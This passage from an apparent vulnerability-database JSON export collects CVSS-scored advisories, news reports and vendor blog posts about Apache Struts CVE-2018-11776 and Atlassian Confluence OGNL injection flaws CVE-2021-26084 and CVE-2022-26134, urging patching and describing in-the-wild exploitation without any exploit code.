Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-22T00:00:00", "type": "attackerkb", "title": "CVE-2018-11776", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-10-06T00:00:00", "id": "AKB:4AA28DD7-15C7-4892-96A3-0190EA268037", "href": "https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-25T18:05:52", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if \u2018Allow people to sign up to create their account\u2019 is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 02, 2021 1:27am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**NinjaOperator** at September 01, 2021 5:38pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**GhostlaX** at September 04, 2021 1:44am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**Cherylyin** at September 03, 2021 2:03am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-26084 Confluence Server OGNL injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-04T00:00:00", "id": "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "href": "https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2018-08-23T21:31:12", "description": "In September 2017, **Equifax** disclosed that a failure to patch one of its Internet servers against a pervasive software flaw -- in a Web component known as **Apache Struts** -- led to a breach that [exposed personal data on 147 million Americans](<https://krebsonsecurity.com/2017/09/the-equifax-breach-what-you-should-know/>). Now security experts are warning that blueprints showing malicious hackers how to exploit a newly-discovered Apache Struts bug are available online, leaving countless organizations in a rush to apply new updates and plug the security hole before attackers can use it to wriggle inside.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2018/08/apache.png)\n\nOn Aug. 22, the **Apache Software Foundation** released software updates to fix [a critical vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-057>) in Apache Struts, a Web application platform used by an estimated 65 percent of Fortune 100 companies. Unfortunately, computer code that can be used to exploit the bug has since been posted online, meaning bad guys now have precise instructions on how to break into vulnerable, unpatched servers.\n\nAttackers can exploit a Web site running the vulnerable Apache Struts installation using nothing more than a Web browser. The bad guy simply needs to send the right request to the site and the Web server will run any command of the attacker's choosing. At that point, the intruder could take any number of actions, such as adding or deleting files, or copying internal databases.\n\nAn [alert](<https://semmle.com/news/apache-struts-CVE-2018-11776>) about the Apache security update was posted Wednesday by **Semmle**, the San Francisco software company whose researchers discovered the bug.\n\n\"The widespread use of Struts by leading enterprises, along with the proven potential impact of this sort of vulnerability, illustrate the threat that this vulnerability poses,\" the alert warns.\n\n\"Critical remote code execution vulnerabilities like the one that affected Equifax and the one we announced today are incredibly dangerous for several reasons: Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\" wrote Semmle co-founder **Pavel Avgustinov**. \"A hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It\u2019s crucially important to update affected systems immediately; to wait is to take an irresponsible risk.\"\n\nThe timeline in the 2017 Equifax breach highlights how quickly attackers can take advantage of Struts flaws. On March 7, 2017, Apache released a patch for a similarly dangerous Struts flaw, and within 24 hours of that update security experts began tracking signs that attackers were exploiting vulnerable servers.\n\nJust three days after the patch was released, attackers found Equifax's servers were vulnerable to the Apache Struts flaw, and used the vulnerability as an initial entry point into the credit bureau's network.\n\n[![](https://krebsonsecurity.com/wp-content/uploads/2018/08/equifaxhack.png)](<https://krebsonsecurity.com/wp-content/uploads/2018/08/equifaxhack.png>)\n\nA slide from \"We are all Equifax,\" an RSA talk given in April 2018 by Derek Weeks.\n\nThe vulnerability affects all supported versions of Struts 2. Users of Struts _2.3_ should upgrade to version _2.3.35;_ users of Struts _2.5_ should upgrade to _2.5.17_.\n\nMore technical details about this bug from its discoverer, **Man Yue Mo**, are [here](<https://lgtm.com/blog/apache_struts_CVE-2018-11776>). The Apache Software Foundation's advisory is [here](<https://cwiki.apache.org/confluence/display/WW/S2-057>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-23T20:22:35", "type": "krebs", "title": "Experts Urge Rapid Patching of \u2018Struts\u2019 Bug", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-23T20:22:35", "id": "KREBS:B3A2371A1AB31AB3CE2E3F1B2243FDC6", "href": "https://krebsonsecurity.com/2018/08/experts-urge-rapid-patching-of-struts-bug/", "cvss": {"score": 0.0, "vector": "NONE"}}], "trendmicroblog": [{"lastseen": "2019-01-03T16:25:04", "description": "![](https://blog.trendmicro.com/wp-content/uploads/2019/01/20180913231810169-116-CgWz2te-800-300x169.jpg)\n\n### **A Changing Landscape**\n\nIn recent years we\u2019ve seen a fundamental shift in the IT landscape, accelerated towards cloud and containerized infrastructures. According to Forbes, by 2020 it is predicted that 83 percent of enterprise workloads will be in the cloud. Moving beyond the cloud, software development teams are driving further change with the adoption of microservice architectures and containers, a market poised to grow over 40 percent year over year. The adoption of these new technologies signals a major change in IT infrastructures for modern enterprises. However, this transition is not always seamless, and it can be difficult to refactor legacy applications for a new technology stack. As a result, teams are building and deploying applications across a variety of environments, including physical machines, virtual machines, containers, and cloud infrastructures. While these new technologies offer great benefits in terms of agility, scalability, and continuous integration (CI)/continuous delivery (CD), they also add a layer of complexity to security that can expose the organization to vulnerabilities and threats. Overall, the combination of new application technology with existing legacy architectures and deployment models leads to greater IT complexity, making it extremely difficult to achieve consistent security across the organization.\n\n### **A Growing Threat to Servers**\n\nEnterprise security has traditionally been thought of as primarily an endpoint issue, however, the modernization of the IT landscape is resulting in attacks from all directions. Servers have become an important target for cybercrime, with more than 145 million U.S. citizens having their data compromised by the Equifax server breach. In recent years, we\u2019ve seen a number of high-profile server-targeted vulnerabilities. For example, the Equifax attack leveraged a server-side vulnerability in the Apache Struts web application framework, and Heartbleed directly targeted servers to reveal private data.\n\nServers are the workhorses of the IT environment, and server workloads have fundamentally different security requirements from traditional endpoint protection. As threats increase in sophistication, there is no single miracle fix to server protection. Rather, it requires multiple techniques through a layered security approach. Security and risk managers should utilize offerings dedicated to cloud workload protection, or cloud workload protection platforms (CWPP). As stated in Gartner\u2019s 2018 Market Guide, \u201cThe market for cloud workload protection platforms (CWPPs) is defined by offerings specifically designed for server workload-centric security protection and are typically agent-based for deep workload visibility and attack prevention capabilities.\u201d*** **\n\n### **Market-Leading Performance**\n\nAdditionally, Trend Micro believes that the Deep Security![\u2122](https://s.w.org/images/core/emoji/11/72x72/2122.png) platform meets many capabilities and architectural considerations listed in Gartner\u2019s Market Guide for Cloud Workload Protection Platforms.\n\nDeep Security offers recommendations through the following:\n\n| \n\n * Seamless integration with leading environments, including AWS, Azure\u00ae, and VMware\u00ae\n * Complete visibility and protection of workloads\n * Automatic discovery and deployment of security controls\n * Security integrated with your DevOps team\u2019s toolsets\n * Support for microservices architectures and Docker\u00ae container protection \n---|--- \n| \n \nThis is all done with minimal impact on performance, allowing companies to maintain their agility without sacrificing security. [Learn more](<https://www.trendmicro.com/en_us/business/products/hybrid-cloud.html>) about our Hybrid Cloud Security solutions, and [contact us](<https://www.trendmicro.com/en_us/business/get-info-form.html>) to discover what makes Trend Micro the number one provider of corporate server security.\n\n##### _Sources:_\n\n##### _*Gartner, \u201cMarket Guide for Cloud Workload Protection Platforms\u201d, Neil MacDonald, 26 March 2018 G00328483. _\n\n##### _451 Research\u2019s Market Monitor: Cloud Enabling Technologies, Q3 2016_\n\n##### _Trend Micro, \u201cCritical Remote Code Execution Vulnerability (CVE-2018-11776) Found in Apache Struts\u201d_\n\n##### _<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/critical-remote-code-execution-vulnerability-cve-2018-11776-found-in-apache-struts>_\n\nThe post [Server Security for the Modern IT Ecosystem](<https://blog.trendmicro.com/server-security-for-the-modern-it-ecosystem/>) appeared first on [](<https://blog.trendmicro.com>).", "cvss3": {}, "published": "2019-01-03T15:30:46", "type": "trendmicroblog", "title": "Server Security for the Modern IT Ecosystem", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2019-01-03T15:30:46", "id": "TRENDMICROBLOG:F79486D4EB7A8032A33EF8200A559E62", "href": "https://blog.trendmicro.com/server-security-for-the-modern-it-ecosystem/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-09-21T15:49:07", "description": "Users are advised to patch immediately: We found exploit samples abusing the Atlassian Confluence vulnerability (CVE-2022-26134) in the wild for malicious cryptocurrency mining.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-21T00:00:00", "type": "trendmicroblog", "title": "Atlassian Confluence Vulnerability CVE-2022-26134 Abused For Cryptocurrency Mining, Other Malware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-21T00:00:00", "id": "TRENDMICROBLOG:B2CE0B51EC84664ADCCD67A2A0DF7033", "href": "https://www.trendmicro.com/en_us/research/22/i/atlassian-confluence-vulnerability-cve-2022-26134-abused-for-cryptocurrency-mining-other-malware.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-21T16:35:19", "description": "Recently, we discovered that the cryptomining trojan z0Miner has been taking advantage of the Atlassian\u2019s Confluence remote code execution (RCE) vulnerability assigned as CVE-2021-26084, which was disclosed by Atlassian in August.", "cvss3": {}, "published": "2021-09-21T00:00:00", "type": "trendmicroblog", "title": "Cryptominer z0Miner Uses Newly Discovered Vulnerability CVE-2021-26084 to Its Advantage", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-21T00:00:00", "id": "TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "href": "https://www.trendmicro.com/en_us/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2018-08-23T17:31:04", "description": "On August 22, Apache Struts released a [security patch](<http://struts.apache.org/announce.html#a20180822-1>) fixing a critical remote code execution vulnerability. This vulnerability has been assigned CVE-2018-11776 (S2-057) and affects Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16. \n\nThe vulnerability was responsibly disclosed by Man Yue Mo from the Semmle Security Research team, check out a detailed description [here](<https://lgtm.com/blog/apache_struts_CVE-2018-11776>). An [exploit PoC ](<https://github.com/jas502n/St2-057/blob/master/README.md>)has already been published. \n\n[Imperva WAF](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>) customers are protected out of the box against this vulnerability, no need for any special configuration on the customer end.", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-23T14:25:36", "type": "impervablog", "title": "Read: Apache Struts Patches \u2018Critical Vulnerability\u2019 CVE-2018-11776", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-23T14:25:36", "id": "IMPERVABLOG:E9D83907E76B2B468512918F211FB65E", "href": "https://www.imperva.com/blog/2018/08/read-apache-struts-patches-critical-vulnerability-cve-2018-11776/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-26T16:46:10", "description": "The **Cyber Defense Awards** in conjunction with [_Cyber Defense Magazine_](<https://www.cyberdefensemagazine.com/>) recently announced the winners of their prestigious annual **Global Infosec Awards for 2022**. We are proud to say that Imperva earned three [**Global Infosec Awards**](<https://cyberdefenseawards.com/global-infosec-awards-for-2022-winners-by-company/>); as _Most Innovative_ for [Application Security](<https://www.imperva.com/products/application-security/>), _Cutting Edge_ for [Cloud Security](<https://www.imperva.com/solutions/securely-move-your-data-to-the-cloud/>), and as a _Market Leader_ for [Data Security](<https://www.imperva.com/products/data-security-fabric/>).\n\nToday, there are more than 4,000 (and counting) cybersecurity companies worldwide. Being singled out in such a crowded field, for three categories, brings enormous satisfaction to us at Imperva. [**Cyber Defense Awards**](<https://cyberdefenseawards.com/global-infosec-awards-for-2022-winners-by-company/>) judges determined that only 10% of cybersecurity companies worldwide deserve these prestigious awards, making the multiple recognition that much more exciting.\n\nIt gives us great pleasure to see our accomplishments recognized and celebrated as winners by [**Cyber Defense Awards**](<https://cyberdefenseawards.com/>), now in their 9th year. It is even more gratifying to know that this renowned body of judges believes our unique people, software, hardware, and solutions can help users get one step ahead of the next cybersecurity threat.\n\nIn this post, we\u2019ll provide an overview of each of the award-winning solutions and offer some insight into why they stand head and shoulders above others in the respective peer groups.\n\n## Most Innovative: Imperva Application Security\n\nIn its most effective form, an [application security solution](<https://www.imperva.com/learn/application-security/application-security/>) protects software application code and data against cyber threats. To reach award-winning effectiveness levels, organizations must apply application security during all phases of development, including design, development, and deployment. It is not enough simply to acquire the solution, you must apply it intelligently through the software development lifecycle.\n\nImperva\u2019s [Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) stops web application attacks that prevent important transactions and steal sensitive data, with near-zero false positives. Imperva also provides powerful [DDoS attack mitigation](<https://www.imperva.com/products/ddos-protection-services/>) and [advanced bad bot protection](<https://www.imperva.com/products/advanced-bot-protection-management/>) that has proven to be scalable as these types of attacks have become [dramatically larger and more sophisticated](<https://www.imperva.com/blog/shorter-sharper-ddos-attacks-are-on-the-rise-and-attackers-are-sidestepping-traditional-mitigation-approaches/>).\n\nImperva\u2019s Application Security solution has been judged particularly innovative because it also provides continuous [protection of all APIs](<https://www.imperva.com/products/api-security/>) using deep discovery and classification of sensitive data to detect all public, private and shadow APIs, and empowers security teams to implement a positive security model. The solution also offers [runtime protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) that protects applications from [zero-day vulnerabilities](<https://www.imperva.com/blog/imperva-customers-protected-from-atlassian-confluence-cve-cve-2022-26134/>), freeing up teams to focus on business logic, without leaving applications exposed to potential exploitation. Finally, the solution [prevents supply chain fraud](<https://www.imperva.com/products/client-side-protection/>) from client-side attacks like formjacking, digital skimming, and Magecart. These features enable users to deploy security at multiple layers and protect applications effectively against different types of attacks.\n\n## Cutting Edge: Cloud Security\n\nImperva's SaaS-based Cloud WAF solution is part of an overall edge platform, architected into a single cloud application security and delivery stack. Users benefit from the best website protection available. The solution delivers PCI-compliant, automated security that goes beyond [OWASP Top 10](<https://www.imperva.com/learn/application-security/owasp-top-10/>) coverage, with the comprehensiveness to reduce the risks that using third party code creates, plus integrated analytics.\n\n[Imperva\u2019s Cloud WAF](<https://www.imperva.com/resources/resource-library/datasheets/imperva-cloud-waf/>) operates as a secure reverse proxy in the cloud alongside our other security services, with our globally distributed content delivery network as its backbone. After a simple DNS change to route your traffic through the Imperva network, we\u2019re able to inspect each and every request sent to the millions of applications and IPs on our network and to filter out any kind of malicious activity at any point of presence (PoP) in our network.\n\nDifferent attack vectors require different mitigation capabilities, and Imperva has built cutting-edge capabilities purpose-built for every kind of attack vector, and proprietary client classification algorithms that enable us to maintain the most updated signature and IP reputation lists in the industry. At each layer of threat detection, managed with a single set of policies, all attacks are blocked at one time without failover. We pass each event on to our analytics for better insights and recommendations to further improve your security posture.\n\n## Market Leader: Data Security\n\nSince 2020, nearly all organizations with a digital presence have migrated workflows and data to cloud-based environments to develop and innovate faster and cheaper with a largely remote workforce. As more data architectures, both on-premises and cloud-native were added, the number of tools designed to manage data security became unmanageable. The resulting set of disparate tools was supposed to offer complete data security, but in practice did not.\n\n[Imperva Data Security Fabric](<https://www.imperva.com/products/data-security-fabric/>) is a holistic, collaborative, and flexible solution. It is not a data security platform, rather it is a fabric that enables what is called a \u201cconvergence of platforms\u201d where organizations can \u201crapidly amalgamate disparate data security capabilities\u201d to secure data more easily and effectively. No matter where a security threat originates, the volume of an attack, or the place where an attack is being waged, your data and the architectures you use are protected.\n\nAs a market leader, Imperva\u2019s Data Security Fabric provides coverage across multi-cloud, hybrid, and on-premises environments, protects all data sources and types, across structured, semi-structured, and unstructured, and integrates with ecosystem technologies for both incident context and additional data capabilities, unifying visibility, control, automation, and insights via a single data service or dashboard.\n\n## See what the buzz is about\n\nTo learn more about these award-winning solutions, click any of the links in the post. That said, we\u2019d much rather learn about your specific needs and challenges in cybersecurity and determine if we can help. [Contact us](<https://www.imperva.com/contact-us/>) and let\u2019s talk.\n\nThe post [Imperva Earns Three Cyber Defense Global InfoSec Awards for 2022](<https://www.imperva.com/blog/imperva-earns-three-cyber-defense-global-infosec-awards-for-2022/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-26T13:16:19", "type": "impervablog", "title": "Imperva Earns Three Cyber Defense Global InfoSec Awards for 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-26T13:16:19", "id": "IMPERVABLOG:F193BFA34E9266EE9047B9FAB1A3A1B5", "href": "https://www.imperva.com/blog/imperva-earns-three-cyber-defense-global-infosec-awards-for-2022/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-11-26T18:09:54", "description": "On August 25, 2021, Atlassian released security updates to address a remote code execution vulnerability (CVE-2021-26084) affecting Confluence Server and Data Center. Recently, CVE-2021-26084 has been detected in exploits in the wild. A remote attacker could exploit this vulnerability to take control of an affected system.\n\nCISA urges users and administrators to review [Atlassian Security Advisory 2021-08-25](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) and immediately apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-03T00:00:00", "type": "cisa", "title": "Atlassian Releases Security Updates for Confluence Server and Data Center", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-03T00:00:00", "id": "CISA:D7188D434879621A3A83E708590EAE42", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-15T14:02:20", "description": "CISA has added one new vulnerability\u2014[CVE-2022-26134](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>)\u2014to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. Note: to view the newly added vulnerabilities in the catalog, click on the arrow on the of the \"Date Added to Catalog\" column, which will sort by descending dates. \n\nThere are currently no updates available. Atlassian is working to issue an update. Per BOD 22-01 Catalog of Known Exploited Vulnerabilities, federal agencies are required to immediately block all internet traffic to and from Atlassian\u2019s Confluence Server and Data Center products until an update is available and successfully applied.\n\n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information. \n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "cisa", "title": "CISA Adds One Known Exploited Vulnerability (CVE-2022-26134) to Catalog\u202f\u202f ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 